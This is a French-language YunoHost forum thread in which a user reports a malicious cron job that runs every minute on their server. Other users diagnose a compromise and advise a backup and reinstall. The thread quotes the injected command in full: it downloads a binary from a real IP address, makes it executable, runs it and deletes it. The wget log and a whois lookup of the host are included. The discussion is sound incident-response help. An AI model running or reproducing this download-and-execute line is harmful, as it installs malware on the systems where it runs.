Tâche wget en boucle, depuis cette nuit

Mon serveur YunoHost

**Matériel: ordinateur récent
Version de YunoHost: 11.0.9.12
J’ai accès à mon serveur : En SSH | Par la webadmin |
Êtes-vous dans un contexte particulier ou avez-vous effectué des modificiations particulières sur votre instance ? : non

Description du problème

Bonjour !

J’ai un truc étrange depuis cette nuit.

Je reçois sur ma boite mail toutes les minutes un mail de ce type :

Objet : Cron admin@temp wget http://195.178.120.53/x-8.6-.ISIS; chmod +x x-8.6-.ISIS; ./x-8.6-.ISIS; rm -rf x-8.6-.ISIS

Corps du mail :

–2022-08-31 11:20:01-- http://195.178.120.53/x-8.6-.ISIS
Connexion à 195.178.120.53:80… connecté.
requête HTTP transmise, en attente de la réponse… 200 OK
Taille : 99332 (97K)
Sauvegarde en : « x-8.6-.ISIS »

 0K .......... .......... .......... .......... .......... 51%  824K 0s
50K .......... .......... .......... .......... .......   100%  149K=0,4s

2022-08-31 11:20:01 (257 KB/s) — « x-8.6-.ISIS » sauvegardé [99332/99332]

Je n’ai pas la moindre idée de ce dont il s’agit et de ce qu’il se passe.

Est-ce que vous auriez une idée de piste pour que je trouve ce qui provoque cela ?

Merci !

Résultat d’une recherche sur l’IP : 195.178.120.53

% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: this output has been filtered.
%       To receive output for a database update, use the "-B" flag.

% Information related to '195.178.120.0 - 195.178.120.255'

% Abuse contact for '195.178.120.0 - 195.178.120.255' is 'ripe@mayak.bg'

inetnum:        195.178.120.0 - 195.178.120.255
netname:        NETERRA-SERVERION_BV-NET
country:        NL
admin-c:        SB27731-RIPE
tech-c:         SB27731-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-NETERRA
mnt-routes:     mnt-nl-descapital-1
mnt-domains:    mnt-nl-descapital-1
created:        2022-06-28T09:01:55Z
last-modified:  2022-06-28T09:01:55Z
source:         RIPE

role:           Serverion B.V.
address:        Krammer 8
address:        3232 HE Brielle
address:        Netherlands
phone:          +31851308333
org:            ORG-DCB8-RIPE
abuse-mailbox:  abuse@serverion.com
nic-hdl:        SB27731-RIPE
mnt-by:         mnt-com-serverion
created:        2020-03-17T15:49:34Z
last-modified:  2020-03-17T15:52:30Z
source:         RIPE # Filtered

% Information related to '195.178.120.0/24AS211252'

route:          195.178.120.0/24
origin:         AS211252
mnt-by:         mnt-nl-descapital-1
created:        2022-07-20T07:26:06Z
last-modified:  2022-07-20T07:26:06Z
source:         RIPE

% This query was served by the RIPE Database Query Service version 1.103 (ANGUS)



Résultat sur le nom du fichier : x-8.6-.ISIS dans un moteur de recherches

Aïe pas glop !

Bon bon bon.

crontab -e j’obtiens :

Mouai ça ressemble à un truc où ton serveur s’est fait poutré … Et tu as “de la chance” de t’en rentre compte, à mon avis la personne qui a écrit le cron job est pas super fut-fut et aurait très bien pû s’arranger pour que le cronjob n’envoie pas ce mail qui est relativement inutile (ou bien l’attaquant ne s’attendait pas à ce que le système de mail fonctionne sur la machine infectée)

Oui du coup j’ai commenté la tâche dans le crontab et modifié le mot de passe admin et celui des users.

Il faut plutôt supprimer cette tâche cron et le fichier /tmp/x-8.6-.ISIS

Non mais à mon avis c’est pas suffisant … La tâche cron n’était que le sommet de l’iceberg à mon avis. Si tu regardes ce que faisais le code du cron, il executait le fichier x-8-6.isis qui - d’après le site trouvé par @mib - est un malware

Qui plus est, si j’ai bien compris, le cron s’est exécuté un root ?

Donc “supprimer le cron” ne résouds pas le problème : quelqu’un de malveillant a exécuté du code sur ta machine, potentiellement en root, donc c’est cuit

Le mieux que tu puisses faire c’est prendre un backup de tes données, formater toute la machine, et restaurer tout sur une instance fraîche.

Aussi pour comprendre comment l’attaquant est rentrer ce serait cool si tu peux en dire plus sur :

  • est-ce que tu as des apps avec une sécurité “pas ouf” (genre Wordpress - en particulier si tu avais dessus des extensions pas très connues)
  • est-ce que tu avais des mots de passes qui n’étaient pas spécialement robuste
  • tout autre manip un peu “hors du commun” que tu aurait pu faire sur la machine …
3 Likes

Rien de folklo non, juste des app dispo officiellement, Nextcloud, photoprism ce genre de choses.
Je pense que mon MDP était le point faible.